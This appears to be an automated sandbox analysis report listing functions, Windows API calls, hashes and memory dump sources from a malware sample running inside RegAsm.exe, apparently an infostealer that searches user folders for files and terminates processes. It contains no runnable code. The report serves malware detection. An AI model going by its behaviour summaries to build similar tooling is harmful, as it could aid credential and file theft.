tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C0CDA31,00100000,?,?,00000000,?), ref: 6C0DD058

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 0e4fe6a1d261a90d580964ae3a8f452ba630e84b58efb4ed9cf3a3b683ec5a8e
Instruction ID: 1dfa0cd269e35fc818f68a013625a77ea7e00f36c85e4362ed2a033ac95308c6
Opcode Fuzzy Hash: 0e4fe6a1d261a90d580964ae3a8f452ba630e84b58efb4ed9cf3a3b683ec5a8e
Instruction Fuzzy Hash: C6D16D71A04B569FD708CF28C480B99F7E1BF89308F01862DD9598B752EB31F9A5CB91

Function 6C091720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C0917B2
memset.VCRUNTIME140(?,00000000,?,?), ref: 6C0918EE
free.MOZGLUE(?), ref: 6C091911
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09194C

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
String ID:
API String ID: 3725304770-0
Opcode ID: b9608969331fac1ae1f2ef098ceece1dc2019252188232bbf8607152de76306f
Instruction ID: 68223413a892d329279d94715965a31f818970c8b55479bd2b51c53855b707ae
Opcode Fuzzy Hash: b9608969331fac1ae1f2ef098ceece1dc2019252188232bbf8607152de76306f
Instruction Fuzzy Hash: 1681AA74B152059FCB08CF68D884BAEBBF9FF89310B04956CE851AB750DB30E944DBA1

Function 6C0A5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C0A5D40
EnterCriticalSection.KERNEL32(6C10F688), ref: 6C0A5D67
__aulldiv.LIBCMT ref: 6C0A5DB4
LeaveCriticalSection.KERNEL32(6C10F688), ref: 6C0A5DED

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: a84d2538b7cd33b88f2412e2c19aafa379abee7e8303536a0c07f7ae5aa19f25
Instruction ID: dda8ff974392c42505e169700b31611860d4c8f30671d5a6e1afee9cf1a50162
Opcode Fuzzy Hash: a84d2538b7cd33b88f2412e2c19aafa379abee7e8303536a0c07f7ae5aa19f25
Instruction Fuzzy Hash: 57516B75F002198FCF08CFA8C855BAEBBF2BB89304F19861DD821A7751CB316946CB90

Function 6C0E7170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C0E7250
EnterCriticalSection.KERNEL32(6C10F688), ref: 6C0E7277
__aulldiv.LIBCMT ref: 6C0E72C4
LeaveCriticalSection.KERNEL32(6C10F688), ref: 6C0E72F7

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: b6370fbaf2100224f84f326157f90d6368ac78061bf24c4a6205b3052215835e
Instruction ID: ec0fcbfe1b159b28a461528d27068c645ffeadbb1c49be0de534f4c41e55b13e
Opcode Fuzzy Hash: b6370fbaf2100224f84f326157f90d6368ac78061bf24c4a6205b3052215835e
Instruction Fuzzy Hash: 04515B71F001298FCF08CFADC851AAEBBB2BB89304F19861DD925A7751CB306946CB90

Function 6C08CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C08CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C08CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C08CF4E

Strings

0, xrefs: 6C08CF30

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: a71faceb2e383094b5f958c37e158ac14c830e8f85262c7e9119fcfc6a959cb3
Instruction ID: 172b80a88213ba3f37346059f464c2e5aa1a5d0cb02ae16aa1c0e7a8ae398b9f
Opcode Fuzzy Hash: a71faceb2e383094b5f958c37e158ac14c830e8f85262c7e9119fcfc6a959cb3
Instruction Fuzzy Hash: AA51FF75A042568FCB04CF18C890BAABBF5EF99300F198699DC595F352D771AD06CBE0

Function 6C0E77D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0E77FA
?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C0E7829

Part of subcall function 6C0BCC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C0831A7), ref: 6C0BCC45
Part of subcall function 6C0BCC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C0831A7), ref: 6C0BCC4E

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C0E789F
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C0E78CF

Part of subcall function 6C084DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C084E5A
Part of subcall function 6C084DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C084E97

Part of subcall function 6C084290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C0C3EBD,6C0C3EBD,00000000), ref: 6C0842A9

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
String ID:
API String ID: 2525797420-0
Opcode ID: a9b6b86f6d000aab86e7c49c2ed0e3f107e07c5a4ec3ed2fbada2ee85483a44a
Instruction ID: 4de00491d8a49b06c180a985f1a4579472a70ec06d68cfbbe34e7493585ee7a4
Opcode Fuzzy Hash: a9b6b86f6d000aab86e7c49c2ed0e3f107e07c5a4ec3ed2fbada2ee85483a44a
Instruction Fuzzy Hash: 6241D071A047469FD700DF29C48066BFBF4FFCA264F604A2EE4A987641DB30E559CB92

Function 6C0C6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C0C82BC,?,?), ref: 6C0C649B

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0C64A9

Part of subcall function 6C0BFA80: GetCurrentThreadId.KERNEL32 ref: 6C0BFA8D
Part of subcall function 6C0BFA80: AcquireSRWLockExclusive.KERNEL32(6C10F448), ref: 6C0BFA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0C653F
free.MOZGLUE(?), ref: 6C0C655A

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 7077f7a42a554492aaa5f531aa0a534a54a7d23b12b23e90fe3570a273511ef5
Instruction ID: eb26cfca6ad8d3c05c99523850bec9f2051ed9d8d3f523971f592dc6e02a3e14
Opcode Fuzzy Hash: 7077f7a42a554492aaa5f531aa0a534a54a7d23b12b23e90fe3570a273511ef5
Instruction Fuzzy Hash: F2315CB5A043059FD704CF24D884BAEBBE4BF89354F50442EE89A97741DB34F919CB92

Function 0041BD80 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041BDC5
_memmove.LIBCMT ref: 0041BDD9
_memmove.LIBCMT ref: 0041BE26
WriteFile.KERNEL32(00000000,?,66F56C5E,?,00000000,00CD2548,?,00000001,00CD2548,?,0041AE6B,?,00000001,00CD2548,66F56C5E,?), ref: 0041BE45

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memmove$FileWritemalloc
String ID:
API String ID: 803809635-0
Opcode ID: f8d90d2511c155f796a90aa74a79be86cc9cbc5625099fdc230df8e4b929144d
Instruction ID: ef32b456043a7c40364d1b26fe1d6b34c9da03a70a3abd589478dda37aa5024c
Opcode Fuzzy Hash: f8d90d2511c155f796a90aa74a79be86cc9cbc5625099fdc230df8e4b929144d
Instruction Fuzzy Hash: FB318F75600704AFD765CF65E980BE7B7F8FB45740B40892FE94687A00DB74F9448B98

Function 6C0DA2B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C0DA315
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6C0DA31F
free.MOZGLUE(00000000,?,?,?,?), ref: 6C0DA36A

Part of subcall function 6C0A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0A5EDB
Part of subcall function 6C0A5E90: memset.VCRUNTIME140(6C0E7765,000000E5,55CCCCCC), ref: 6C0A5F27
Part of subcall function 6C0A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0A5FB2

Part of subcall function 6C0D2140: free.MOZGLUE(?,00000060,?,6C0D7D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D215D

free.MOZGLUE(00000000), ref: 6C0DA37C

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
String ID:
API String ID: 700533648-0
Opcode ID: afc942f1b2316584add12598b9319a47c3aca57135d0227861d21974d5dc89c6
Instruction ID: 64f428e33a00770eee5898b66257144f7100616be3cd28f49b2f5c22cf0e134a
Opcode Fuzzy Hash: afc942f1b2316584add12598b9319a47c3aca57135d0227861d21974d5dc89c6
Instruction Fuzzy Hash: A9210475A043249BCB00DF4AC840B9EBBE9EF86758F568015ED095B701DB32FD06C6D2

Function 004122B0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004122D7

Part of subcall function 00411D61: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
Part of subcall function 00411D61: HeapAlloc.KERNEL32(00000000), ref: 00411D73
Part of subcall function 00411D61: wsprintfW.USER32 ref: 00411D84

OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
CloseHandle.KERNEL32(00000000), ref: 00412392

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
String ID:
API String ID: 2224742867-0
Opcode ID: 8d2f111dba6cb19f7d8687405dc9f393da82ae6e0468ba9acff790c296a2a6c5
Instruction ID: d389cef70183d5cd616f040657d4303a3a928023e9a5c5ea90d08b3fb0bb435f
Opcode Fuzzy Hash: 8d2f111dba6cb19f7d8687405dc9f393da82ae6e0468ba9acff790c296a2a6c5
Instruction Fuzzy Hash: 6B314D72A0121CAFDF20DF61DD849EEB7BDEB0A345F0400AAF909E2550D6399F848F56

Function 6C0BFF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C0DD019,?,?,?,?,?,00000000,?,6C0CDA31,00100000,?), ref: 6C0BFFD3
memcpy.VCRUNTIME140(00000000,?,?,?,6C0DD019,?,?,?,?,?,00000000,?,6C0CDA31,00100000,?,?), ref: 6C0BFFF5
free.MOZGLUE(?,?,?,?,?,6C0DD019,?,?,?,?,?,00000000,?,6C0CDA31,00100000,?), ref: 6C0C001B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C0DD019,?,?,?,?,?,00000000,?,6C0CDA31,00100000,?,?), ref: 6C0C002A

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 826125452-0
Opcode ID: 99c582d3a8d3e41bb3b7bf65c1b58db0d311dc5492a6b4bcdb0e9d53075d9dda
Instruction ID: b3383cf778d3d98fd0c29e33812bf764822145897348969a39737bd6e6088433
Opcode Fuzzy Hash: 99c582d3a8d3e41bb3b7bf65c1b58db0d311dc5492a6b4bcdb0e9d53075d9dda
Instruction Fuzzy Hash: 7121D8B6B002165BC718DF789C949AFB7FAFB853247250338E425E7780EB71AD0186D1

Function 0041665F Relevance: 6.1, APIs: 4, Instructions: 73stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 004166A7
lstrcatA.KERNEL32(?,00436B4C), ref: 004166C4
lstrcatA.KERNEL32(?), ref: 004166D7
lstrcatA.KERNEL32(?,00436B50), ref: 004166E9

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID:
API String ID: 153043497-0
Opcode ID: c4f50c1d24547cc29a72e15d362f30183b109c2c9d9d5fb6f85994bd63f68b1a
Instruction ID: cfafa51994c6dd41316c3016dfe646ce489cf68115bfde9b3865c7b361435df3
Opcode Fuzzy Hash: c4f50c1d24547cc29a72e15d362f30183b109c2c9d9d5fb6f85994bd63f68b1a
Instruction Fuzzy Hash: FF21B57190021DAFCF54DF60DC46AD9B779EB08305F1040A6F549A3190EEBA9BC48F44

Function 6C0E7930 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C09BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C0E7A3F), ref: 6C09BF11
Part of subcall function 6C09BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C0E7A3F), ref: 6C09BF5D
Part of subcall function 6C09BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C0E7A3F), ref: 6C09BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C0E7968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C0EA264,6C0EA264), ref: 6C0E799A

Part of subcall function 6C099830: free.MOZGLUE(?,?,?,6C0E7ABE), ref: 6C09985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C0E79E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C0E79E8

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: 7b1f1c5d6edda5b041c93ee1ed90ce25311746ca0474e99de9b6ac38901451d8
Instruction ID: 3c4d62d64f0125be3d9dc9c95478586034671f6b97c93b205ecc43a12b748f3a
Opcode Fuzzy Hash: 7b1f1c5d6edda5b041c93ee1ed90ce25311746ca0474e99de9b6ac38901451d8
Instruction Fuzzy Hash: 702148357043049FCB14DF18D889A9EFBE5EF89314F04882DE99A87361CB30A909DB92

Function 6C0E7A10 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C09BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C0E7A3F), ref: 6C09BF11
Part of subcall function 6C09BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C0E7A3F), ref: 6C09BF5D
Part of subcall function 6C09BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C0E7A3F), ref: 6C09BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6C0E7A48
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6C0E7A7A

Part of subcall function 6C099830: free.MOZGLUE(?,?,?,6C0E7ABE), ref: 6C09985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C0E7AC0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C0E7AC8

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: ec6006fc7f6c1fa6261bd6903a5b7f703b40f4731e838119c940da691bedab44
Instruction ID: 2960ffd2d91a9214321f1d861a7aceb257b00ed2f27e2c364ae0ebff17a8691d
Opcode Fuzzy Hash: ec6006fc7f6c1fa6261bd6903a5b7f703b40f4731e838119c940da691bedab44
